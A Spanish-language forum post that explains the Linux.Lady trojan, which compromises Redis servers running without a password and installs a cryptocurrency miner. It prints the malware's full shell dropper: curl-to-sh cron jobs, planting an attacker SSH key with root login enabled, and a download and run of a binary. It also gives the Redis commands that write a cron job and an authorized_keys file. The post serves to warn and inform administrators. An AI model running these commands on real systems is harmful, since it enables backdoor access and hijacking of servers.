Foro Wifi-libre.com

Se ha detectado un troyano llamado Linux.Lady diseñado contra los servidores que usan por defecto Redis NoSQL

  Hay tan pocos troyanos para Linux que es casi todo un evento cuando sale uno.
El problema para ellos es que no pasan desaparecidos mucho tiempo: No es fácil esconderse en un código abierto.
  Los de Doctorweb acaban de publicar un reporte sobre uno de estos bichos raros pillado en acción que responde al nombre de Linux.Lady

• Linux.Lady.1 @ Doctor Web Antivirus

  Es un malware que afecta a las distribuciones Linux para servidores
Explota la "ignorancia" (o falta de atención) de los administradores lo más descuidados (o ignorantes): Compromete los sistemas que emplean Redis NoSQL por defecto y que no tienen una contraseña habilitada/configurada para limitar el uso este programa.

A pesar de que "proteger con contraseña" sea la base de este oficio y la piedra angular de la seguridad, se estima que podría haber hasta 30 000 servidores vulnerables.
  Parte de la responsabilidad cae en los hombros de  VMware y Pivotal (los que lanzaron Redis) por proponer une configuración por defecto insegura.
Los datos SQL son un tesoro a proteger.
  Redis se promociona como siendo "liviano y rápido"
Es justamente por falta de proceso de identificación que logra estos aparentes buenos resultados... 
Sacrificar la seguridad para engañar a los más bobos no está bien...

  Hay que reconocer que nuestra Linux.Lady tiene clase.
No es un virus destructivo a lo tonto sino un parásito que sabe encontrar el equilibrio entre chupar los recursos de su huésped y dejarlo vivo.
   Con capacidad a propagarse.
  Sus principales características son

1. Recoge información sobre la maquina infectada y la manda al servidor de control remoto

2. Descarga y instala en la maquina infectada un programa de criptografía

3. Ataca los otros ordenadores de la red para auto-replicarse

  En resumen es un malware que crea un parque de zombis dedicados a "minar Bit Coins"

  El troyano crea un ejecutable /usr/sbin/ntp y un fichero de configuración /etc/systemd/system/ntp.service que tiene esta pinta:

[Unit]
Description=NTP daemon
ConditionFileIsExecutable=/usr/sbin/ntp
[Service]
StartLimitInterval=5
StartLimitBurst=10
ExecStart=/usr/sbin/ntp "-D"
Restart=always
RestartSec=120
[Install]
WantedBy=multi-user.target

 
  Una vez cómodamente instalada; La Linux.Lady empieza su labor y crea cuatros canales.
Manda al servidor remoto información sobre la maquina infectada:

• Versión de Lady.Linux

• Cuantas CPU tiene la maquina infectada

• nombre del huésped

• Cuantos procesos están corriendo

• nombre del Sistema Operativo

• A que "familia" pertenece el sistema operativo

• Tiempo de actividad el huésped

  A cambio de esto recibe un fichero de configuración a medida para entrar en acción: Descargar, instalar y ejecutar un programa de criptografía (escrito en lenguaje go) para minar BitCoins.
  Determina una IP externa para establecer una conexión directa hacía el servidor del atacante usando el puerto 6379 sin autenticarse (es el puerto que usa Redis)
  Si consigue contactar con el servidor descarga desde la url del fichero de configuración un script ( Linux.DownLoader.196,) que instala en el cron scheduler (planificación de procesos/rutinas programadas)
  Esto es lo que hace nuestra "Lady"

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/10 * * * * curl -fsSL http://r.*****ring.com/pm.sh?0706 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/10 * * * * curl -fsSL http://r. *****ring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
    mkdir -p ~/.ssh
    rm -f ~/.ssh/authorized_keys*
    echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq
    echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
    echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
    echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
    echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
    /etc/init.d/sshd restart
fi
if [ ! -f "/etc/init.d/ntp" ]; then
    if [ ! -f "/etc/systemd/system/ntp.service" ]; then
        mkdir -p /opt
        curl -fsSL http://r. ****ring.com/v51/lady_`uname -m` -o /opt/KHK75NEOiq33 && chmod +x /opt/KHK75NEOiq33 && /opt/KHK75NEOiq33 -Install
    fi
fi
/etc/init.d/ntp start
ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9

Una vez la conexión establecida el troyano ejecuta estas ordenes

config set stop-writes-on-bgsave-error no
config set rdbcompression no
config set dir /var/spool/cron
config set dbfilename root
set 1 ("\n\n*/1 * * * * curl -L %s | sh\n\n") % (ShellUrl из конфига)
save
config set dir /root/.ssh
config set dbfilename authorized_keys
set 1 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA4TjWxZeA8JlaBwfvgtjvDT0bm9d4JGbzz1KIIGyvSKxd7bqYLwXfxr0Q+tZxF5nHXldH2pRNacD7Gm8XX4aZCUYlL5Ev0goYmOTgXOQNkgyVQKPE6KGV5BZpNoB2sbIkuweLbbdZaOcncnFvAEh7dVUQ5lh2QLz/IuRzakrzaJeTPiaD3BAyXhjcVwDFn1Lb84uiqc7nW6gw2bIaSMOrNTfZH/xftGdI'UpJoQK06jmFrTlpWaL5joAooc2Evan6XnqkO4g5In7tjhX8pBtCBGk78SKCJmkEjK'+xbN+7oZhuaeB/ubPm3xDahi+w1xHGZIt/N7z268Fz3rQAhBUZ+eQ==
save
del 1
set dir /tmp
set dbfilename dump.rdb
config set rdbcompression yes

  Incluyendo así una llave SSH valida para conectarse mediante este protocolo desde el sistema huésped hacia el servidor remoto.
  La maquina infectada ejecutará por SSH y con esta llave

(curl -fsSL %s?ssh | sh) % (ShellUrl)

   Para instalar el programa para minar Bit Coins
  Se trata de un conjunto de librerías "Go" alojadas en GitHub
   Podéis ver aquí su arborescencia (No se ve muy bien, lo siento, así es la captura que pusieron)

Más lectura

• Linux.Lady trojan turns Linux servers into bitcoin miners de Graeme BURTON @ The Enquirer